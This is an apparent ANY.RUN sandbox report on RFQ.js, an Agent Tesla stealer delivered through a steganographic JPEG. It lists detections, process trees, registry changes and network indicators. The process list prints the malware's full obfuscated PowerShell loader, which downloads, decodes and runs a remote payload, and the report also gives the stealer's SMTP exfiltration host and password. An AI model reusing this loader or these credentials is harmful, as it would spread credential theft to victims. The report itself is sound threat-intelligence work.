File name:

RFQ.js

Full analysis: https://app.any.run/tasks/832c8cc4-f2e0-4e04-ba2e-719647921c9f
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Analysis date: April 15, 2025, 18:58:47
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stegocampaign
payload
ta558
apt
evasion
stealer
agenttesla
loader
reverseloader
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with very long lines (464), with CRLF line terminators
MD5:

433A9653BFF6B1327BEEC575941043C7

SHA1:

5CF586D44651FCCED47742C14BDC6A70E2403CD6

SHA256:

36C8CFD24C980C7B834B71C224C2B393A58303C8F8500046914F53694D0BC37A

SSDEEP:

48:5iaxLz5cuDfxLV+V+M+zzMtXV+RyRRzYE6z6hyURt6N6yn:gaxLdcgBV+V+M+zzMtXV+RyRRzYE6z6q

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 2384)
    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 2384)
    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 2384)
    • STEGOCAMPAIGN has been detected

      • powershell.exe (PID: 5864)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 5864)
    • Steals credentials from Web Browsers

      • MSBuild.exe (PID: 4688)
    • Actions looks like stealing of personal data

      • MSBuild.exe (PID: 4688)
    • AGENTTESLA has been detected (YARA)

      • MSBuild.exe (PID: 4688)
    • REVERSELOADER has been detected (SURICATA)

      • powershell.exe (PID: 5864)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 5864)
  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2384)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2384)
    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 2384)
    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 2384)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 2384)
    • Potential Corporate Privacy Violation

      • wscript.exe (PID: 2384)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5864)
    • Contacting a server suspected of hosting an Exploit Kit

      • powershell.exe (PID: 5864)
    • Checks for external IP

      • svchost.exe (PID: 2196)
      • MSBuild.exe (PID: 4688)
    • Connects to SMTP port

      • MSBuild.exe (PID: 4688)
  • INFO

    • Checks proxy server information

      • wscript.exe (PID: 2384)
      • powershell.exe (PID: 5864)
      • MSBuild.exe (PID: 4688)
      • slui.exe (PID: 6960)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 5864)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 5864)
    • Disables trace logs

      • powershell.exe (PID: 5864)
      • MSBuild.exe (PID: 4688)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5864)
    • Reads the computer name

      • MSBuild.exe (PID: 4688)
    • Reads the machine GUID from the registry

      • MSBuild.exe (PID: 4688)
    • Reads the software policy settings

      • MSBuild.exe (PID: 4688)
      • slui.exe (PID: 6960)
    • Checks supported languages

      • MSBuild.exe (PID: 4688)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AgentTesla

(PID) Process(4688) MSBuild.exe
Protocolsmtp
Hostmail.ctdi.com.ph
Port587
PasswordA#f+Y]H8iO4a
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
131
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe #STEGOCAMPAIGN powershell.exe conhost.exe no specs #AGENTTESLA msbuild.exe svchost.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1184\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2384"C:\Windows\System32\WScript.exe" C:\Users\admin\Desktop\RFQ.jsC:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4688"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
AgentTesla
(PID) Process(4688) MSBuild.exe
Protocolsmtp
Hostmail.ctdi.com.ph
Port587
PasswordA#f+Y]H8iO4a
5864"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JSeattleBySeattleG8SeattledQBnSeattleGgSeattlebgBlSeattleGMSeattleawSeattlegSeattleD0SeattleISeattleSeattlenSeattleCMSeattleeSeattleSeattlejSeattleC4SeattleYQBtSeattleG0SeattleLwBySeattleGISeattleLgSeattlejSeattleGUSeattlebgSeattleuSeattleG0SeattlebwBjSeattleGUSeattlebSeattleBlSeattleCMSeattleIwBlSeattleG4SeattleawBuSeattleGkSeattlebSeattleSeattlevSeattleC8SeattleOgBwSeattleCMSeattleIwBoSeattleCcSeattleOwSeattlekSeattleEgSeattleZQBySeattleG0SeattleZQBzSeattleCSeattleSeattlePQSeattlegSeattleCQSeattlecgBvSeattleHUSeattleZwBoSeattleG4SeattleZQBjSeattleGsSeattleISeattleSeattletSeattleHISeattleZQBwSeattleGwSeattleYQBjSeattleGUSeattleISeattleSeattlenSeattleCMSeattleJwSeattlesSeattleCSeattleSeattleJwB0SeattleCcSeattleOwSeattlekSeattleHISeattleYQBtSeattleG0SeattleZQBkSeattleCSeattleSeattlePQSeattlegSeattleCcSeattleaSeattleB0SeattleHQSeattlecSeattleBzSeattleDoSeattleLwSeattlevSeattleGESeattlecgBjSeattleGgSeattleaQB2SeattleGUSeattleLgBvSeattleHISeattleZwSeattlevSeattleGQSeattlebwB3SeattleG4SeattlebSeattleBvSeattleGESeattleZSeattleSeattlevSeattleG4SeattleZQB3SeattleF8SeattleaQBtSeattleGESeattleZwBlSeattleF8SeattleMgSeattlewSeattleDISeattleNQSeattlewSeattleDQSeattleMQSeattlezSeattleC8SeattlebgBlSeattleHcSeattleXwBpSeattleG0SeattleYQBnSeattleGUSeattleLgBqSeattleHSeattleSeattleZwSeattlenSeattleDsSeattleJSeattleBhSeattleGMSeattleZQB0SeattleG8SeattlebgBpSeattleGQSeattleZQBzSeattleCSeattleSeattlePQSeattlegSeattleE4SeattleZQB3SeattleC0SeattleTwBiSeattleGoSeattleZQBjSeattleHQSeattleISeattleBTSeattleHkSeattlecwB0SeattleGUSeattlebQSeattleuSeattleE4SeattleZQB0SeattleC4SeattleVwBlSeattleGISeattleQwBsSeattleGkSeattleZQBuSeattleHQSeattleOwSeattlekSeattleGESeattleYwBlSeattleHQSeattlebwBuSeattleGkSeattleZSeattleBlSeattleHMSeattleLgBISeattleGUSeattleYQBkSeattleGUSeattlecgBzSeattleC4SeattleQQBkSeattleGQSeattleKSeattleSeattlenSeattleFUSeattlecwBlSeattleHISeattleLQBBSeattleGcSeattleZQBuSeattleHQSeattleJwSeattlesSeattleCcSeattleTQBvSeattleHoSeattleaQBsSeattleGwSeattleYQSeattlevSeattleDUSeattleLgSeattlewSeattleCcSeattleKQSeattle7SeattleCQSeattlecwBoSeattleG8SeattlecSeattleBtSeattleGESeattleaQBkSeattleCSeattleSeattlePQSeattlegSeattleCQSeattleYQBjSeattleGUSeattledSeattleBvSeattleG4SeattleaQBkSeattleGUSeattlecwSeattleuSeattleEQSeattlebwB3SeattleG4SeattlebSeattleBvSeattleGESeattleZSeattleBESeattleGESeattledSeattleBhSeattleCgSeattleJSeattleBySeattleGESeattlebQBtSeattleGUSeattleZSeattleSeattlepSeattleDsSeattleJSeattleBuSeattleG8SeattlebgBnSeattleGESeattlebQBlSeattleHISeattlecwSeattlegSeattleD0SeattleISeattleBbSeattleFMSeattleeQBzSeattleHQSeattleZQBtSeattleC4SeattleVSeattleBlSeattleHgSeattledSeattleSeattleuSeattleEUSeattlebgBjSeattleG8SeattleZSeattleBpSeattleG4SeattleZwBdSeattleDoSeattleOgBVSeattleFQSeattleRgSeattle4SeattleC4SeattleRwBlSeattleHQSeattleUwB0SeattleHISeattleaQBuSeattleGcSeattleKSeattleSeattlekSeattleHMSeattleaSeattleBvSeattleHSeattleSeattlebQBhSeattleGkSeattleZSeattleSeattlepSeattleDsSeattleJSeattleBuSeattleG8SeattlebgBmSeattleGUSeattleYQBzSeattleGESeattlebgBjSeattleGUSeattlecwSeattlegSeattleD0SeattleISeattleSeattlenSeattleDwSeattlePSeattleBCSeattleEESeattleUwBFSeattleDYSeattleNSeattleBfSeattleFMSeattleVSeattleBBSeattleFISeattleVSeattleSeattle+SeattleD4SeattleJwSeattle7SeattleCQSeattleaQBuSeattleGMSeattleZQBzSeattleHQSeattledQBvSeattleHUSeattlecwSeattlegSeattleD0SeattleISeattleSeattlenSeattleDwSeattlePSeattleBCSeattleEESeattleUwBFSeattleDYSeattleNSeattleBfSeattleEUSeattleTgBESeattleD4SeattlePgSeattlenSeattleDsSeattleJSeattleBoSeattleHUSeattlebSeattleBzSeattleGUSeattleYQBuSeattleCSeattleSeattlePQSeattlegSeattleCQSeattlebgBvSeattleG4SeattleZwBhSeattleG0SeattleZQBySeattleHMSeattleLgBJSeattleG4SeattleZSeattleBlSeattleHgSeattleTwBmSeattleCgSeattleJSeattleBuSeattleG8SeattlebgBmSeattleGUSeattleYQBzSeattleGESeattlebgBjSeattleGUSeattlecwSeattlepSeattleDsSeattleJSeattleBjSeattleG8SeattlebgBmSeattleGkSeattlebgBlSeattleGQSeattlebSeattleB5SeattleCSeattleSeattlePQSeattlegSeattleCQSeattlebgBvSeattleG4SeattleZwBhSeattleG0SeattleZQBySeattleHMSeattleLgBJSeattleG4SeattleZSeattleBlSeattleHgSeattleTwBmSeattleCgSeattleJSeattleBpSeattleG4SeattleYwBlSeattleHMSeattledSeattleB1SeattleG8SeattledQBzSeattleCkSeattleOwSeattlekSeattleGgSeattledQBsSeattleHMSeattleZQBhSeattleG4SeattleISeattleSeattletSeattleGcSeattleZQSeattlegSeattleDSeattleSeattleISeattleSeattletSeattleGESeattlebgBkSeattleCSeattleSeattleJSeattleBjSeattleG8SeattlebgBmSeattleGkSeattlebgBlSeattleGQSeattlebSeattleB5SeattleCSeattleSeattleLQBnSeattleHQSeattleISeattleSeattlekSeattleGgSeattledQBsSeattleHMSeattleZQBhSeattleG4SeattleOwSeattlekSeattleGgSeattledQBsSeattleHMSeattleZQBhSeattleG4SeattleISeattleSeattlerSeattleD0SeattleISeattleSeattlekSeattleG4SeattlebwBuSeattleGYSeattleZQBhSeattleHMSeattleYQBuSeattleGMSeattleZQBzSeattleC4SeattleTSeattleBlSeattleG4SeattleZwB0SeattleGgSeattleOwSeattlekSeattleG4SeattlebwBuSeattleGwSeattleaQBiSeattleGUSeattlecgBhSeattleGwSeattleISeattleSeattle9SeattleCSeattleSeattleJSeattleBjSeattleG8SeattlebgBmSeattleGkSeattlebgBlSeattleGQSeattlebSeattleB5SeattleCSeattleSeattleLQSeattlegSeattleCQSeattleaSeattleB1SeattleGwSeattlecwBlSeattleGESeattlebgSeattle7SeattleCQSeattleaSeattleBvSeattleHISeattlecwBlSeattleHISeattleYQBkSeattleGkSeattlecwBoSeattleGUSeattlecwSeattlegSeattleD0SeattleISeattleSeattlekSeattleG4SeattlebwBuSeattleGcSeattleYQBtSeattleGUSeattlecgBzSeattleC4SeattleUwB1SeattleGISeattlecwB0SeattleHISeattleaQBuSeattleGcSeattleKSeattleSeattlekSeattleGgSeattledQBsSeattleHMSeattleZQBhSeattleG4SeattleLSeattleSeattlegSeattleCQSeattlebgBvSeattleG4SeattlebSeattleBpSeattleGISeattleZQBySeattleGESeattlebSeattleSeattlepSeattleDsSeattleJSeattleBLSeattleGUSeattleZgBhSeattleGwSeattlebwB2SeattleHISeattleaQBzSeattleHMSeattleaQSeattlegSeattleD0SeattleISeattleBbSeattleFMSeattleeQBzSeattleHQSeattleZQBtSeattleC4SeattleQwBvSeattleG4SeattledgBlSeattleHISeattledSeattleBdSeattleDoSeattleOgBGSeattleHISeattlebwBtSeattleEISeattleYQBzSeattleGUSeattleNgSeattle0SeattleFMSeattledSeattleBySeattleGkSeattlebgBnSeattleCgSeattleJSeattleBoSeattleG8SeattlecgBzSeattleGUSeattlecgBhSeattleGQSeattleaQBzSeattleGgSeattleZQBzSeattleCkSeattleOwSeattlekSeattleHMSeattleeQBjSeattleG8SeattlecSeattleBoSeattleGESeattlebgB0SeattleGkSeattlecwBtSeattleCSeattleSeattlePQSeattlegSeattleFsSeattleUwB5SeattleHMSeattledSeattleBlSeattleG0SeattleLgBSSeattleGUSeattleZgBsSeattleGUSeattleYwB0SeattleGkSeattlebwBuSeattleC4SeattleQQBzSeattleHMSeattleZQBtSeattleGISeattlebSeattleB5SeattleF0SeattleOgSeattle6SeattleEwSeattlebwBhSeattleGQSeattleKSeattleSeattlekSeattleEsSeattleZQBmSeattleGESeattlebSeattleBvSeattleHYSeattlecgBpSeattleHMSeattlecwBpSeattleCkSeattleOwSeattlekSeattleHMSeattlecSeattleB1SeattleGcSeattleZwBpSeattleGUSeattleISeattleSeattle9SeattleCSeattleSeattleWwBkSeattleG4SeattlebSeattleBpSeattleGISeattleLgBJSeattleE8SeattleLgBISeattleG8SeattlebQBlSeattleF0SeattleLgBHSeattleGUSeattledSeattleBNSeattleGUSeattledSeattleBoSeattleG8SeattleZSeattleSeattleoSeattleCcSeattleVgBBSeattleEkSeattleJwSeattlepSeattleC4SeattleSQBuSeattleHYSeattlebwBrSeattleGUSeattleKSeattleSeattlekSeattleG4SeattledQBsSeattleGwSeattleLSeattleSeattlegSeattleFsSeattlebwBiSeattleGoSeattleZQBjSeattleHQSeattleWwBdSeattleF0SeattleISeattleBSeattleSeattleCgSeattleJSeattleBISeattleGUSeattlecgBtSeattleGUSeattlecwSeattlesSeattleCcSeattleJwSeattlesSeattleCcSeattleJwSeattlesSeattleCcSeattleJwSeattlesSeattleCcSeattleTQBTSeattleEISeattledQBpSeattleGwSeattleZSeattleSeattlenSeattleCwSeattleJwSeattlenSeattleCwSeattleJwSeattlenSeattleCwSeattleJwSeattlenSeattleCwSeattleJwSeattlenSeattleCwSeattleJwBDSeattleDoSeattleXSeattleBVSeattleHMSeattleZQBySeattleHMSeattleXSeattleBQSeattleHUSeattleYgBsSeattleGkSeattleYwBcSeattleEQSeattlebwB3SeattleG4SeattlebSeattleBvSeattleGESeattleZSeattleBzSeattleCcSeattleLSeattleSeattlenSeattleEQSeattleZQBzSeattleG4SeattleYQSeattlenSeattleCwSeattleJwBqSeattleHMSeattleJwSeattlesSeattleCcSeattleJwSeattlesSeattleCcSeattleJwSeattlesSeattleCcSeattlecwB0SeattleGESeattlebSeattleBhSeattleGMSeattledSeattleBpSeattleHQSeattleaQBjSeattleGESeattlebSeattleSeattlenSeattleCwSeattleJwSeattleySeattleCcSeattleLSeattleSeattlenSeattleCcSeattleKQSeattlepSeattleSeattle=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('Seattle','A'))); Invoke-Expression $OWjuxd""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6960C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
13 414
Read events
13 399
Write events
15
Delete events
0

Modification events

(PID) Process:(2384) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
6CD6100000000000
(PID) Process:(4688) MSBuild.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4688) MSBuild.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(4688) MSBuild.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(4688) MSBuild.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(4688) MSBuild.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(4688) MSBuild.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(4688) MSBuild.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(4688) MSBuild.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4688) MSBuild.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
Executable files
0
Suspicious files
1
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
5864powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zg5jczkn.bug.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5864powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_o1bgx2dn.akh.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5864powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:3277A59A4850D6172976DDA14BAFB486
SHA256:91E25FCE2D921F5D4CCF5BC2219C5BAFB344372007494C56D794E1B5E4334D9F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
37
TCP/UDP connections
55
DNS requests
20
Threats
13

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2384
wscript.exe
GET
301
23.186.113.60:80
http://paste.ee/d/FunHe8Xc
unknown
shared
2104
svchost.exe
GET
200
104.124.11.17:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
302
207.241.224.2:443
https://archive.org/download/new_image_20250413/new_image.jpg
unknown
5864
powershell.exe
GET
200
162.241.2.198:80
http://linknettelecom.net.br/mma.txt
unknown
4688
MSBuild.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
whitelisted
5436
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
5436
SIHClient.exe
GET
200
2.18.121.139:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
5436
SIHClient.exe
GET
200
2.18.121.139:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
5436
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5436
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
300
RUXIMICS.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2104
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
2384
wscript.exe
23.186.113.60:80
paste.ee
shared
2384
wscript.exe
23.186.113.60:443
paste.ee
shared
2104
svchost.exe
104.124.11.17:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
6544
svchost.exe
20.190.160.64:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.74.206
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
paste.ee
  • 23.186.113.60
shared
crl.microsoft.com
  • 104.124.11.17
  • 104.124.11.58
  • 2.18.121.139
  • 2.18.121.147
whitelisted
login.live.com
  • 20.190.160.64
  • 20.190.160.17
  • 20.190.160.131
  • 40.126.32.134
  • 40.126.32.76
  • 20.190.160.128
  • 20.190.160.65
  • 20.190.160.20
whitelisted
archive.org
  • 207.241.224.2
whitelisted
ia601700.us.archive.org
  • 207.241.227.90
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
  • 40.127.240.158
whitelisted
linknettelecom.net.br
  • 162.241.2.198
unknown
ip-api.com
  • 208.95.112.1
whitelisted

Threats

PID
Process
Class
Message
Misc activity
ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)
Potential Corporate Privacy Violation
ET INFO Pastebin-style Service (paste .ee) in TLS SNI
Misc activity
INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
Misc activity
INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
A Network Trojan was detected
PAYLOAD [ANY.RUN] Base64 encoded PE EXE file inside JPEG image
A Network Trojan was detected
PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
Exploit Kit Activity Detected
ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
No debug info